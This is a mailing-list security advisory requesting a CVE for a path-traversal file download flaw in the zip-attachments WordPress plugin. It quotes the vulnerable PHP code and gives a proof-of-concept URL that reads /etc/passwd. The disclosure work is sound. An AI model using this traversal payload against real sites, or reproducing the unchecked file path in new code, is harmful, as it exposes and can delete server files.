Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 12 Jun 2015 14:35:16 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: zip-attachments v1.1.4 wordpress plugin arbitrary file download
 vulnerability.

May I please have a CVE for this issue:

Title: zip-attachments v1.1.4 wordpress plugin arbitrary file download vulnerability.
Author: Larry W. Cashdollar
Date: 6/10/2015
Vendor: Rick Torres @ricard_dev
Vendor Notified: 6/11/2015
Fixed in:  v1.1.5  by vendor.
Download: https://wordpress.org/plugins/zip-attachments/
CVEID: TBD
Description: Simple and lightweight plugin to add a "Download" button to your posts, pages or custom post types.

Vulnerability: zip-attachments allows arbitrary file downloads because it doesn't check the download path of the requested file.

In zip-attachments/download.php, there is no check to see if the file is outside of the intended download path:

  8 if(isset($_REQUEST['za_file']) && !empty($_REQUEST['za_file'])){
  9 
 10     $file = $_GET['za_file'];
 11     $filename = $_GET['za_filename'];
 12 
 13     header('Content-Type: application/zip');
 14     header('Content-Length: ' . filesize($file));
 15     header('Content-Disposition: attachment; filename="'.$filename.'.zip"');
 16 
 17     readfile($file);
 18     unlink($file);

Any file readable by the httpd process can be downloaded.

PoC:
http://www.example.com/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.